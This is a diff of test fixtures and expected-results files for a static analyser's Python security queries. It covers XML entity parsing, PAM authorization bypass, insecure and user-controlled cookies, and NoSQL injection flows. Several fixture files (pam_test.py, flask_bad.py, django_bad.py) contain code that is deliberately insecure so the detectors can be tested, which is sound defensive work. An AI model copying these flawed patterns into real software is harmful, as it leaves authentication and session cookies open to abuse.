-    parser = xml.sax.make_parser()
-    if cond:
-        parser.setFeature(xml.sax.handler.feature_external_ges, True)
-        parser.parse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='DTD retrieval' vuln='Quadratic Blowup' vuln='XXE'
-    else:
-        parser.parse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-# make it vuln, then making it safe
-# a bit of an edge-case, but is nice to be able to handle.
-parser = xml.sax.make_parser()
-parser.setFeature(xml.sax.handler.feature_external_ges, True)
-parser.setFeature(xml.sax.handler.feature_external_ges, False)
-parser.parse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-def check_conditional_assignment(cond):
-    parser = xml.sax.make_parser()
-    if cond:
-        parser.setFeature(xml.sax.handler.feature_external_ges, True)
-    else:
-        parser.setFeature(xml.sax.handler.feature_external_ges, False)
-    parser.parse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='DTD retrieval' vuln='Quadratic Blowup' vuln='XXE'
-
-def check_conditional_assignment2(cond):
-    parser = xml.sax.make_parser()
-    if cond:
-        flag_value = True
-    else:
-        flag_value = False
-    parser.setFeature(xml.sax.handler.feature_external_ges, flag_value)
-    parser.parse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='DTD retrieval' vuln='Quadratic Blowup' vuln='XXE'

python/ql/test/experimental/library-tests/frameworks/XML/xmltodict.py

@@ -1,8 +0,0 @@
-import xmltodict
-
-x = "some xml"
-
-xmltodict.parse(x) # $ input=x
-xmltodict.parse(xml_input=x) # $ input=x
-
-xmltodict.parse(x, disable_entities=False) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'

python/ql/test/experimental/meta/ConceptsTest.qll

@@ -539,3 +539,54 @@ class HttpClientRequestTest extends InlineExpectationsTest {
     )
   }
 }
+
+class CsrfProtectionSettingTest extends InlineExpectationsTest {
+  CsrfProtectionSettingTest() { this = "CsrfProtectionSettingTest" }
+
+  override string getARelevantTag() { result = "CsrfProtectionSetting" }
+
+  override predicate hasActualResult(Location location, string element, string tag, string value) {
+    exists(location.getFile().getRelativePath()) and
+    exists(HTTP::Server::CsrfProtectionSetting setting |
+      location = setting.getLocation() and
+      element = setting.toString() and
+      value = setting.getVerificationSetting().toString() and
+      tag = "CsrfProtectionSetting"
+    )
+  }
+}
+
+class CsrfLocalProtectionSettingTest extends InlineExpectationsTest {
+  CsrfLocalProtectionSettingTest() { this = "CsrfLocalProtectionSettingTest" }
+
+  override string getARelevantTag() { result = "CsrfLocalProtection" + ["Enabled", "Disabled"] }
+
+  override predicate hasActualResult(Location location, string element, string tag, string value) {
+    exists(location.getFile().getRelativePath()) and
+    exists(HTTP::Server::CsrfLocalProtectionSetting p |
+      location = p.getLocation() and
+      element = p.toString() and
+      value = p.getRequestHandler().getName().toString() and
+      if p.csrfEnabled()
+      then tag = "CsrfLocalProtectionEnabled"
+      else tag = "CsrfLocalProtectionDisabled"
+    )
+  }
+}
+
+class XmlParsingTest extends InlineExpectationsTest {
+  XmlParsingTest() { this = "XmlParsingTest" }
+
+  override string getARelevantTag() { result = "xmlVuln" }
+
+  override predicate hasActualResult(Location location, string element, string tag, string value) {
+    exists(location.getFile().getRelativePath()) and
+    exists(XML::XmlParsing parsing, XML::XmlParsingVulnerabilityKind kind |
+      parsing.vulnerableTo(kind) and
+      location = parsing.getLocation() and
+      element = parsing.toString() and
+      value = "'" + kind + "'" and
+      tag = "xmlVuln"
+    )
+  }
+}

python/ql/test/experimental/query-tests/Security/CWE-285/PamAuthorization.expected

@@ -0,0 +1 @@
+| pam_test.py:48:18:48:44 | ControlFlowNode for pam_authenticate() | This PAM authentication call may be lead to an authorization bypass. |

python/ql/test/experimental/query-tests/Security/CWE-285/PamAuthorization.qlref

@@ -0,0 +1 @@
+experimental/Security/CWE-285/PamAuthorization.ql

python/ql/test/experimental/query-tests/Security/CWE-285/pam_test.py

@@ -0,0 +1,63 @@
+from ctypes import CDLL, POINTER, Structure, byref
+from ctypes import c_char_p, c_int
+from ctypes.util import find_library
+
+
+class PamHandle(Structure):
+    pass
+
+
+class PamMessage(Structure):
+    pass
+
+
+class PamResponse(Structure):
+    pass
+
+
+class PamConv(Structure):
+    pass
+
+# this is normal way to do things
+libpam = CDLL(find_library("pam"))
+
+# but we also handle assignment to temp variable
+temp = find_library("pam")
+libpam = CDLL(temp)
+
+pam_start = libpam.pam_start
+pam_start.restype = c_int
+pam_start.argtypes = [c_char_p, c_char_p, POINTER(PamConv), POINTER(PamHandle)]
+
+pam_authenticate = libpam.pam_authenticate
+pam_authenticate.restype = c_int
+pam_authenticate.argtypes = [PamHandle, c_int]
+
+pam_acct_mgmt = libpam.pam_acct_mgmt
+pam_acct_mgmt.restype = c_int
+pam_acct_mgmt.argtypes = [PamHandle, c_int]
+
+
+class pam():
+
+    def authenticate_bad(self, username, service='login'):
+        handle = PamHandle()
+        conv = PamConv(None, 0)
+        retval = pam_start(service, username, byref(conv), byref(handle))
+
+        retval = pam_authenticate(handle, 0)
+        auth_success = retval == 0
+
+        return auth_success
+
+    def authenticate_good(self, username, service='login'):
+        handle = PamHandle()
+        conv = PamConv(None, 0)
+        retval = pam_start(service, username, byref(conv), byref(handle))
+
+        retval = pam_authenticate(handle, 0)
+        if retval == 0:
+            retval = pam_acct_mgmt(handle, 0)
+        auth_success = retval == 0
+
+        return auth_success

python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/SimpleXmlRpcServer.expected

@@ -0,0 +1 @@
+| xmlrpc_server.py:7:10:7:48 | ControlFlowNode for SimpleXMLRPCServer() | SimpleXMLRPCServer is vulnerable to XML bombs |

python/ql/test/experimental/query-tests/Security/CWE-611/SimpleXmlRpcServer.expected

@@ -1 +0,0 @@
-| xmlrpc_server.py:7:10:7:48 | ControlFlowNode for SimpleXMLRPCServer() | SimpleXMLRPCServer is vulnerable to: Billion Laughs, Quadratic Blowup. |

python/ql/test/experimental/query-tests/Security/CWE-611/XmlEntityInjection.qlref

@@ -1 +0,0 @@
-experimental/Security/CWE-611/XmlEntityInjection.ql

python/ql/test/experimental/query-tests/Security/CWE-614/CookieInjection.expected

@@ -0,0 +1,63 @@
+edges
+| django_bad.py:27:33:27:67 | ControlFlowNode for Attribute() | django_bad.py:27:30:27:124 | ControlFlowNode for Fstring |
+| django_bad.py:27:71:27:106 | ControlFlowNode for Attribute() | django_bad.py:27:30:27:124 | ControlFlowNode for Fstring |
+| flask_bad.py:24:21:24:27 | ControlFlowNode for request | flask_bad.py:24:21:24:32 | ControlFlowNode for Attribute |
+| flask_bad.py:24:21:24:27 | ControlFlowNode for request | flask_bad.py:24:49:24:60 | ControlFlowNode for Attribute |
+| flask_bad.py:24:21:24:32 | ControlFlowNode for Attribute | flask_bad.py:24:21:24:40 | ControlFlowNode for Subscript |
+| flask_bad.py:24:49:24:55 | ControlFlowNode for request | flask_bad.py:24:49:24:60 | ControlFlowNode for Attribute |
+| flask_bad.py:24:49:24:60 | ControlFlowNode for Attribute | flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript |
+| flask_bad.py:32:37:32:43 | ControlFlowNode for request | flask_bad.py:32:37:32:48 | ControlFlowNode for Attribute |
+| flask_bad.py:32:37:32:43 | ControlFlowNode for request | flask_bad.py:32:60:32:71 | ControlFlowNode for Attribute |
+| flask_bad.py:32:37:32:48 | ControlFlowNode for Attribute | flask_bad.py:32:37:32:56 | ControlFlowNode for Subscript |
+| flask_bad.py:32:37:32:56 | ControlFlowNode for Subscript | flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring |
+| flask_bad.py:32:60:32:66 | ControlFlowNode for request | flask_bad.py:32:60:32:71 | ControlFlowNode for Attribute |
+| flask_bad.py:32:60:32:71 | ControlFlowNode for Attribute | flask_bad.py:32:60:32:80 | ControlFlowNode for Subscript |
+| flask_bad.py:32:60:32:80 | ControlFlowNode for Subscript | flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring |
+nodes
+| django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() |
+| django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() |
+| django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | semmle.label | ControlFlowNode for Fstring |
+| django_bad.py:27:33:27:67 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() |
+| django_bad.py:27:71:27:106 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() |
+| flask_bad.py:24:21:24:27 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
+| flask_bad.py:24:21:24:32 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
+| flask_bad.py:24:21:24:40 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
+| flask_bad.py:24:49:24:55 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
+| flask_bad.py:24:49:24:60 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
+| flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
+| flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | semmle.label | ControlFlowNode for Fstring |
+| flask_bad.py:32:37:32:43 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
+| flask_bad.py:32:37:32:48 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
+| flask_bad.py:32:37:32:56 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
+| flask_bad.py:32:60:32:66 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
+| flask_bad.py:32:60:32:71 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
+| flask_bad.py:32:60:32:80 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
+subpaths
+#select
+| django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | Cookie is constructed from a $@,and its httponly flag is not properly set. | django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | user-supplied input |
+| django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | Cookie is constructed from a $@,and its samesite flag is not properly set. | django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | user-supplied input |
+| django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | Cookie is constructed from a $@,and its secure flag is not properly set. | django_bad.py:19:21:19:55 | ControlFlowNode for Attribute() | user-supplied input |
+| django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | Cookie is constructed from a $@,and its httponly flag is not properly set. | django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | user-supplied input |
+| django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | Cookie is constructed from a $@,and its samesite flag is not properly set. | django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | user-supplied input |
+| django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | Cookie is constructed from a $@,and its secure flag is not properly set. | django_bad.py:20:21:20:56 | ControlFlowNode for Attribute() | user-supplied input |
+| django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | django_bad.py:27:33:27:67 | ControlFlowNode for Attribute() | django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its httponly flag is not properly set. | django_bad.py:27:33:27:67 | ControlFlowNode for Attribute() | user-supplied input |
+| django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | django_bad.py:27:33:27:67 | ControlFlowNode for Attribute() | django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its samesite flag is not properly set. | django_bad.py:27:33:27:67 | ControlFlowNode for Attribute() | user-supplied input |
+| django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | django_bad.py:27:33:27:67 | ControlFlowNode for Attribute() | django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its secure flag is not properly set. | django_bad.py:27:33:27:67 | ControlFlowNode for Attribute() | user-supplied input |
+| django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | django_bad.py:27:71:27:106 | ControlFlowNode for Attribute() | django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its httponly flag is not properly set. | django_bad.py:27:71:27:106 | ControlFlowNode for Attribute() | user-supplied input |
+| django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | django_bad.py:27:71:27:106 | ControlFlowNode for Attribute() | django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its samesite flag is not properly set. | django_bad.py:27:71:27:106 | ControlFlowNode for Attribute() | user-supplied input |
+| django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | django_bad.py:27:71:27:106 | ControlFlowNode for Attribute() | django_bad.py:27:30:27:124 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its secure flag is not properly set. | django_bad.py:27:71:27:106 | ControlFlowNode for Attribute() | user-supplied input |
+| flask_bad.py:24:21:24:40 | ControlFlowNode for Subscript | flask_bad.py:24:21:24:27 | ControlFlowNode for request | flask_bad.py:24:21:24:40 | ControlFlowNode for Subscript | Cookie is constructed from a $@,and its httponly flag is not properly set. | flask_bad.py:24:21:24:27 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:24:21:24:40 | ControlFlowNode for Subscript | flask_bad.py:24:21:24:27 | ControlFlowNode for request | flask_bad.py:24:21:24:40 | ControlFlowNode for Subscript | Cookie is constructed from a $@,and its samesite flag is not properly set. | flask_bad.py:24:21:24:27 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:24:21:24:40 | ControlFlowNode for Subscript | flask_bad.py:24:21:24:27 | ControlFlowNode for request | flask_bad.py:24:21:24:40 | ControlFlowNode for Subscript | Cookie is constructed from a $@,and its secure flag is not properly set. | flask_bad.py:24:21:24:27 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | flask_bad.py:24:21:24:27 | ControlFlowNode for request | flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | Cookie is constructed from a $@,and its httponly flag is not properly set. | flask_bad.py:24:21:24:27 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | flask_bad.py:24:21:24:27 | ControlFlowNode for request | flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | Cookie is constructed from a $@,and its samesite flag is not properly set. | flask_bad.py:24:21:24:27 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | flask_bad.py:24:21:24:27 | ControlFlowNode for request | flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | Cookie is constructed from a $@,and its secure flag is not properly set. | flask_bad.py:24:21:24:27 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | flask_bad.py:24:49:24:55 | ControlFlowNode for request | flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | Cookie is constructed from a $@,and its httponly flag is not properly set. | flask_bad.py:24:49:24:55 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | flask_bad.py:24:49:24:55 | ControlFlowNode for request | flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | Cookie is constructed from a $@,and its samesite flag is not properly set. | flask_bad.py:24:49:24:55 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | flask_bad.py:24:49:24:55 | ControlFlowNode for request | flask_bad.py:24:49:24:69 | ControlFlowNode for Subscript | Cookie is constructed from a $@,and its secure flag is not properly set. | flask_bad.py:24:49:24:55 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | flask_bad.py:32:37:32:43 | ControlFlowNode for request | flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its httponly flag is not properly set. | flask_bad.py:32:37:32:43 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | flask_bad.py:32:37:32:43 | ControlFlowNode for request | flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its samesite flag is not properly set. | flask_bad.py:32:37:32:43 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | flask_bad.py:32:37:32:43 | ControlFlowNode for request | flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its secure flag is not properly set. | flask_bad.py:32:37:32:43 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | flask_bad.py:32:60:32:66 | ControlFlowNode for request | flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its httponly flag is not properly set. | flask_bad.py:32:60:32:66 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | flask_bad.py:32:60:32:66 | ControlFlowNode for request | flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its samesite flag is not properly set. | flask_bad.py:32:60:32:66 | ControlFlowNode for request | user-supplied input |
+| flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | flask_bad.py:32:60:32:66 | ControlFlowNode for request | flask_bad.py:32:34:32:98 | ControlFlowNode for Fstring | Cookie is constructed from a $@,and its secure flag is not properly set. | flask_bad.py:32:60:32:66 | ControlFlowNode for request | user-supplied input |

python/ql/test/experimental/query-tests/Security/CWE-614/CookieInjection.qlref

@@ -0,0 +1 @@
+experimental/Security/CWE-614/CookieInjection.ql

python/ql/test/experimental/query-tests/Security/CWE-614/InsecureCookie.expected

@@ -0,0 +1,30 @@
+| django_bad.py:6:5:7:52 | ControlFlowNode for Attribute() | Cookie is added without the 'httponly' flag properly set. |
+| django_bad.py:6:5:7:52 | ControlFlowNode for Attribute() | Cookie is added without the 'samesite' flag properly set. |
+| django_bad.py:6:5:7:52 | ControlFlowNode for Attribute() | Cookie is added without the 'secure' flag properly set. |
+| django_bad.py:13:5:13:26 | ControlFlowNode for Subscript | Cookie is added without the 'httponly' flag properly set. |
+| django_bad.py:13:5:13:26 | ControlFlowNode for Subscript | Cookie is added without the 'samesite' flag properly set. |
+| django_bad.py:13:5:13:26 | ControlFlowNode for Subscript | Cookie is added without the 'secure' flag properly set. |
+| django_bad.py:19:5:21:66 | ControlFlowNode for Attribute() | Cookie is added without the 'httponly' flag properly set. |
+| django_bad.py:19:5:21:66 | ControlFlowNode for Attribute() | Cookie is added without the 'samesite' flag properly set. |
+| django_bad.py:19:5:21:66 | ControlFlowNode for Attribute() | Cookie is added without the 'secure' flag properly set. |
+| django_bad.py:27:5:27:26 | ControlFlowNode for Subscript | Cookie is added without the 'httponly' flag properly set. |
+| django_bad.py:27:5:27:26 | ControlFlowNode for Subscript | Cookie is added without the 'samesite' flag properly set. |
+| django_bad.py:27:5:27:26 | ControlFlowNode for Subscript | Cookie is added without the 'secure' flag properly set. |
+| django_good.py:19:5:19:44 | ControlFlowNode for Attribute() | Cookie is added without the 'httponly' flag properly set. |
+| django_good.py:19:5:19:44 | ControlFlowNode for Attribute() | Cookie is added without the 'samesite' flag properly set. |
+| django_good.py:19:5:19:44 | ControlFlowNode for Attribute() | Cookie is added without the 'secure' flag properly set. |
+| flask_bad.py:9:5:10:52 | ControlFlowNode for Attribute() | Cookie is added without the 'httponly' flag properly set. |
+| flask_bad.py:9:5:10:52 | ControlFlowNode for Attribute() | Cookie is added without the 'samesite' flag properly set. |
+| flask_bad.py:9:5:10:52 | ControlFlowNode for Attribute() | Cookie is added without the 'secure' flag properly set. |
+| flask_bad.py:17:5:17:30 | ControlFlowNode for Subscript | Cookie is added without the 'httponly' flag properly set. |
+| flask_bad.py:17:5:17:30 | ControlFlowNode for Subscript | Cookie is added without the 'samesite' flag properly set. |
+| flask_bad.py:17:5:17:30 | ControlFlowNode for Subscript | Cookie is added without the 'secure' flag properly set. |
+| flask_bad.py:24:5:25:52 | ControlFlowNode for Attribute() | Cookie is added without the 'httponly' flag properly set. |
+| flask_bad.py:24:5:25:52 | ControlFlowNode for Attribute() | Cookie is added without the 'samesite' flag properly set. |
+| flask_bad.py:24:5:25:52 | ControlFlowNode for Attribute() | Cookie is added without the 'secure' flag properly set. |
+| flask_bad.py:32:5:32:30 | ControlFlowNode for Subscript | Cookie is added without the 'httponly' flag properly set. |
+| flask_bad.py:32:5:32:30 | ControlFlowNode for Subscript | Cookie is added without the 'samesite' flag properly set. |
+| flask_bad.py:32:5:32:30 | ControlFlowNode for Subscript | Cookie is added without the 'secure' flag properly set. |
+| flask_good.py:23:5:23:57 | ControlFlowNode for Attribute() | Cookie is added without the 'httponly' flag properly set. |
+| flask_good.py:23:5:23:57 | ControlFlowNode for Attribute() | Cookie is added without the 'samesite' flag properly set. |
+| flask_good.py:23:5:23:57 | ControlFlowNode for Attribute() | Cookie is added without the 'secure' flag properly set. |

python/ql/test/experimental/query-tests/Security/CWE-614/InsecureCookie.qlref

@@ -0,0 +1 @@
+experimental/Security/CWE-614/InsecureCookie.ql

python/ql/test/experimental/query-tests/Security/CWE-614/django_bad.py

@@ -0,0 +1,28 @@
+import django.http
+
+
+def django_response(request):
+    resp = django.http.HttpResponse()
+    resp.set_cookie("name", "value", secure=False,
+                    httponly=False, samesite='None')
+    return resp
+
+
+def django_response():
+    response = django.http.HttpResponse()
+    response['Set-Cookie'] = "name=value; SameSite=None;"
+    return response
+
+
+def django_response(request):
+    resp = django.http.HttpResponse()
+    resp.set_cookie(django.http.request.GET.get("name"),
+                    django.http.request.GET.get("value"),
+                    secure=False, httponly=False, samesite='None')
+    return resp
+
+
+def django_response():
+    response = django.http.HttpResponse()
+    response['Set-Cookie'] = f"{django.http.request.GET.get('name')}={django.http.request.GET.get('value')}; SameSite=None;"
+    return response

python/ql/test/experimental/query-tests/Security/CWE-614/django_good.py

@@ -0,0 +1,20 @@
+import django.http
+
+
+def django_response(request):
+    resp = django.http.HttpResponse()
+    resp['Set-Cookie'] = "name=value; Secure; HttpOnly; SameSite=Lax;"
+    return resp
+
+
+def django_response(request):
+    resp = django.http.HttpResponse()
+    resp.set_cookie("name", "value", secure=True,
+                    httponly=True, samesite='Lax')
+    return resp
+
+
+def indeterminate(secure):
+    resp = django.http.HttpResponse()
+    resp.set_cookie("name", "value", secure)
+    return resp

python/ql/test/experimental/query-tests/Security/CWE-614/flask_bad.py

@@ -0,0 +1,37 @@
+from flask import Flask, request, make_response, Response
+
+app = Flask(__name__)
+
+
+@app.route("/1")
+def false():
+    resp = make_response()
+    resp.set_cookie("name", value="value", secure=False,
+                    httponly=False, samesite='None')
+    return resp
+
+
+@app.route("/2")
+def flask_Response():
+    resp = Response()
+    resp.headers['Set-Cookie'] = "name=value; SameSite=None;"
+    return resp
+
+
+@app.route("/3")
+def false():
+    resp = make_response()
+    resp.set_cookie(request.args["name"], value=request.args["value"], secure=False,
+                    httponly=False, samesite='None')
+    return resp
+
+
+@app.route("/4")
+def flask_Response():
+    resp = Response()
+    resp.headers['Set-Cookie'] = f"{request.args['name']}={request.args['value']}; SameSite=None;"
+    return resp
+
+
+# if __name__ == "__main__":
+#     app.run(debug=True)

python/ql/test/experimental/query-tests/Security/CWE-614/flask_good.py

@@ -0,0 +1,28 @@
+from flask import Flask, request, make_response, Response
+
+app = Flask(__name__)
+
+
+@app.route("/1")
+def true():
+    resp = make_response()
+    resp.set_cookie("name", value="value", secure=True,
+                    httponly=True, samesite='Lax')
+    return resp
+
+
+@app.route("/2")
+def flask_Response():
+    resp = Response()
+    resp.headers['Set-Cookie'] = "name=value; Secure; HttpOnly; SameSite=Lax;"
+    return resp
+
+
+def indeterminate(secure):
+    resp = make_response()
+    resp.set_cookie("name", value="value", secure=secure)
+    return resp
+
+
+# if __name__ == "__main__":
+#     app.run(debug=True)

python/ql/test/experimental/query-tests/Security/CWE-943/NoSQLInjection.expected

@@ -44,11 +44,19 @@ edges
 | mongoengine_bad.py:57:21:57:42 | ControlFlowNode for Subscript | mongoengine_bad.py:58:30:58:42 | ControlFlowNode for unsafe_search |
 | mongoengine_bad.py:58:19:58:43 | ControlFlowNode for Attribute() | mongoengine_bad.py:61:29:61:49 | ControlFlowNode for Dict |
 | mongoengine_bad.py:58:30:58:42 | ControlFlowNode for unsafe_search | mongoengine_bad.py:58:19:58:43 | ControlFlowNode for Attribute() |
-| pymongo_bad.py:11:21:11:27 | ControlFlowNode for request | pymongo_bad.py:11:21:11:32 | ControlFlowNode for Attribute |
-| pymongo_bad.py:11:21:11:32 | ControlFlowNode for Attribute | pymongo_bad.py:11:21:11:42 | ControlFlowNode for Subscript |
-| pymongo_bad.py:11:21:11:42 | ControlFlowNode for Subscript | pymongo_bad.py:12:30:12:42 | ControlFlowNode for unsafe_search |
-| pymongo_bad.py:12:19:12:43 | ControlFlowNode for Attribute() | pymongo_bad.py:14:42:14:62 | ControlFlowNode for Dict |
-| pymongo_bad.py:12:30:12:42 | ControlFlowNode for unsafe_search | pymongo_bad.py:12:19:12:43 | ControlFlowNode for Attribute() |
+| pymongo_test.py:12:21:12:27 | ControlFlowNode for request | pymongo_test.py:12:21:12:32 | ControlFlowNode for Attribute |
+| pymongo_test.py:12:21:12:32 | ControlFlowNode for Attribute | pymongo_test.py:12:21:12:42 | ControlFlowNode for Subscript |
+| pymongo_test.py:12:21:12:42 | ControlFlowNode for Subscript | pymongo_test.py:13:30:13:42 | ControlFlowNode for unsafe_search |
+| pymongo_test.py:13:19:13:43 | ControlFlowNode for Attribute() | pymongo_test.py:15:42:15:62 | ControlFlowNode for Dict |
+| pymongo_test.py:13:30:13:42 | ControlFlowNode for unsafe_search | pymongo_test.py:13:19:13:43 | ControlFlowNode for Attribute() |
+| pymongo_test.py:29:16:29:51 | ControlFlowNode for Attribute() | pymongo_test.py:33:34:33:73 | ControlFlowNode for Dict |
+| pymongo_test.py:29:27:29:33 | ControlFlowNode for request | pymongo_test.py:29:27:29:38 | ControlFlowNode for Attribute |
+| pymongo_test.py:29:27:29:38 | ControlFlowNode for Attribute | pymongo_test.py:29:27:29:50 | ControlFlowNode for Subscript |
+| pymongo_test.py:29:27:29:50 | ControlFlowNode for Subscript | pymongo_test.py:29:16:29:51 | ControlFlowNode for Attribute() |
+| pymongo_test.py:39:16:39:51 | ControlFlowNode for Attribute() | pymongo_test.py:43:34:43:73 | ControlFlowNode for Dict |
+| pymongo_test.py:39:27:39:33 | ControlFlowNode for request | pymongo_test.py:39:27:39:38 | ControlFlowNode for Attribute |
+| pymongo_test.py:39:27:39:38 | ControlFlowNode for Attribute | pymongo_test.py:39:27:39:50 | ControlFlowNode for Subscript |
+| pymongo_test.py:39:27:39:50 | ControlFlowNode for Subscript | pymongo_test.py:39:16:39:51 | ControlFlowNode for Attribute() |
 nodes
 | flask_mongoengine_bad.py:19:21:19:27 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
 | flask_mongoengine_bad.py:19:21:19:32 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
@@ -104,12 +112,22 @@ nodes
 | mongoengine_bad.py:58:19:58:43 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() |
 | mongoengine_bad.py:58:30:58:42 | ControlFlowNode for unsafe_search | semmle.label | ControlFlowNode for unsafe_search |
 | mongoengine_bad.py:61:29:61:49 | ControlFlowNode for Dict | semmle.label | ControlFlowNode for Dict |
-| pymongo_bad.py:11:21:11:27 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
-| pymongo_bad.py:11:21:11:32 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
-| pymongo_bad.py:11:21:11:42 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
-| pymongo_bad.py:12:19:12:43 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() |
-| pymongo_bad.py:12:30:12:42 | ControlFlowNode for unsafe_search | semmle.label | ControlFlowNode for unsafe_search |
-| pymongo_bad.py:14:42:14:62 | ControlFlowNode for Dict | semmle.label | ControlFlowNode for Dict |
+| pymongo_test.py:12:21:12:27 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
+| pymongo_test.py:12:21:12:32 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
+| pymongo_test.py:12:21:12:42 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
+| pymongo_test.py:13:19:13:43 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() |
+| pymongo_test.py:13:30:13:42 | ControlFlowNode for unsafe_search | semmle.label | ControlFlowNode for unsafe_search |
+| pymongo_test.py:15:42:15:62 | ControlFlowNode for Dict | semmle.label | ControlFlowNode for Dict |
